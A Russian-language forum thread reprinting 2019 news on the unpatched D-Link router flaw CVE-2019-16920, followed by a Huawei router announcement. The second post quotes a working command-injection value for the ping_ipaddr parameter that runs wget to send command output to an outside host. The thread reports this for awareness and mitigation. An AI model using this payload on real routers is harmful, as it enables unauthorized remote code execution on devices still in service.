Новости:

Роутеры.

This is a discussion for the topic Роутеры. the board Смарт-часы, Cмартфоны, Аккустика, Wifi роутеры.

Автор Тема: Роутеры.  (Прочитано 181 раз)

0 Пользователей и 1 Гость просматривают эту тему.

2 Ответов  Роутеры.
: 09 Октябрь 2019, 20:24:35
Модераторы раздела

603
Сообщений

В роутерах D-Link найдена критическая «дыра». Производитель не желает ее исправлять
09.10.2019, Ср, 11:43, Мск


Уязвимость, найденная в сентябре 2019 г., позволяет злоумышленникам запускать произвольный код на устройствах D-Link без авторизации. Вендор не будет выпускать исправления, поскольку уязвимыми оказались исключительно устройства, снятые с поддержки.

Никудышная авторизация

В роутерах D-Link обнаружена критическая уязвимость, позволяющая запускать на них произвольный код удалённо. Несмотря на то, что она получила высшие балы по шкале угроз, выпускать патч производитель роутеров не планирует.

Уязвимость CVE-2019-16920, выявленная в сентябре 2018 г., связана с возможностью инъекции команд без авторизации в программной оболочке устройств. Уязвимость получила 9,8 балла по шкале CVSS v31 и 10,0 по шкале CVSS v20.

«Баг» присутствует в прошивках роутеров D-Link DIR-655, DIR-866L, DIR-652 и DHP-1565.

Проверка авторизации пользователя реализована в этих прошивках очень слабо, так что запуск произвольного кода может производиться любым непривилегированным пользователем.

«Уязвимость начинается с нерабочей проверки авторизации. Чтобы проверить на практике наличие проблемы, мы открываем страницу администратора и осуществляем вход. Затем направляем запрос POST HTTP на apply_sec.cgi с действием ping_test. А дальше мы производим инъекцию команды в ping_ipaddr. Даже если нас возвращает на страницу логина, команда ping_test всё равно выполняется - величина ping_ipaddr исполняет команду «echo 1234» на собственном сервере роутера и возвращает результаты на наш сервер», - говорится в техническом описании Fortinet/FortiGuard.

Патча не будет

D-Link не будет выпускать патч для этой проблемы, поскольку все продукты, её затронутые, уже сняты с производства и технической поддержки. Таким образом, у пользователей есть лишь один способ защититься от угрозы: поменять оборудование на более новое.

«Формально D-Link не за что предъявлятть претензии: использование оборудования, снятого с поддержки, - целиком личное дело его владельцев, хотя в исключительных случаях производители иногда всё-таки выпускают исправления и для уже устаревшего оборудования, - говорит Алексей Водясов, эксперт по информационной безопасности компании SEC Consult Services. - Другое дело, что роутеры - это вообще одна из самых проблемных составляющих локальных сетей, и обнаруженные уязвимости это лишний раз подтверждают. Защите маршрутизаторов уделяется меньше всего внимания (при том, что через них проходит весь трафик), да и ошибки в прошивках, в том числе критические, выявляются регулярно. При этом роутеры будут, скорее всего, использоваться до тех пор, пока они сохраняют минимальную работоспособность - или пока не станут явным источником проблем».

По мнению эксперта, в отношении роутеров должна действовать «презумпция подозрительности» и любые обновления должны устанавливаться как можно оперативнее.
 

Ответ #1
: 11 Октябрь 2019, 18:51:57
Модераторы раздела

603
Сообщений

Удалённо эксплуатируемая уязвимость в маршрутизаторах D-Link
11.10.2019 10:40


В беспроводных маршрутизаторах D-Link выявлена опасная уязвимость (CVE-2019–16920), позволяющая удалённо выполнить код на стороне устройства через отправку специального запроса к обработчику "ping_test", доступному без прохождения аутентификации.

Интересно, что по задумке разработчиков прошивки вызов "ping_test" должен выполняться только после аутентификации, но на деле он вызывается в любом случае, независимо от входа в web-интерфейс. В частности, при обращении к скрипту apply_sec.cgi с передачей параметра "action=ping_test", скрипт перебрасывает на страницу аутентификации, но при этом выполняет связанное с ping_test действие. Для выполнения кода использована ещё одна уязвимость в самом ping_test, который вызывает утилиту ping без должной проверки корректности переданного для тестирования IP-адреса. Например, для вызова утилиты wget и передачи на внешний хост результатов выполнения команды "echo 1234" достаточно указать параметр "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo 1234)".



Наличие уязвимости официально подтверждено в моделях:

    DIR-655 с прошивкой 3.02b05 или старее;
    DIR-866L с прошивкой 1.03b04 или старее;
    DIR-1565 с прошивкой 1.01 или старее;
    DIR-652 (данных о версиях проблемных прошивок не приводится)

Время сопровождения данных моделей уже истекло, поэтому компания D-Link заявила, что не будет выпускать для них обновления с устранением уязвимости, не рекомендует использовать и советует заменить на новые устройства. В качестве обходного пути защиты можно ограничить доступ к web-интерфейсу только для заслуживающих доверия IP-адресов.

Позднее выяснилось, что уязвимость также затрагивает модели DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 и DIR-825, о планах по выпуску обновлений для которых пока ничего не известно.
 

Ответ #2
: 01 Декабрь 2019, 09:29:35
Модераторы раздела

388
Сообщений

Huawei представила мощный роутер с поддержкой NFC

Компания Huawei представила первый в мире роутер с NFC-приемником для быстрого спаривания устройств. Новинка интересна не только высокой производительностью, но и доступным ценником.

Особенности



Все, что нужно будет сделать пользователю для подключения – разблокировать смартфон, активировать NFC и приложить гаджет к верхней крышке роутера. После этого произойдет подключение к Wi-Fi сети без указания логина и пароля.

Основные характеристики
Huawei A2 оснащен процессором с тактовой частотой 1,4 ГГц. Роутер поддерживает двухдиапазонную передачу сигнала 2,4 ГГц и 5 ГГц, причем 5-гигагерцовый вариант доступен в двух исполнениях: низко- и высокочастотном. Предусмотрено шесть независимых усилителей сигнала.

Максимальная скорость беспроводной передачи данных составляет 2134 Мбит/с. Маршрутизатор защищен от взлома и DDOS/DOS-атак и предусматривает возможность создания "черных" списков MAС-адресов для блокирования устройств.

Дата выхода и цена
Стоимость новинки составляет 57 долларов (ориентировочно 1400 гривен по курсу по состоянию на 1 декабря 2019 года). Старт продаж роутера запланирован на 1 декабря.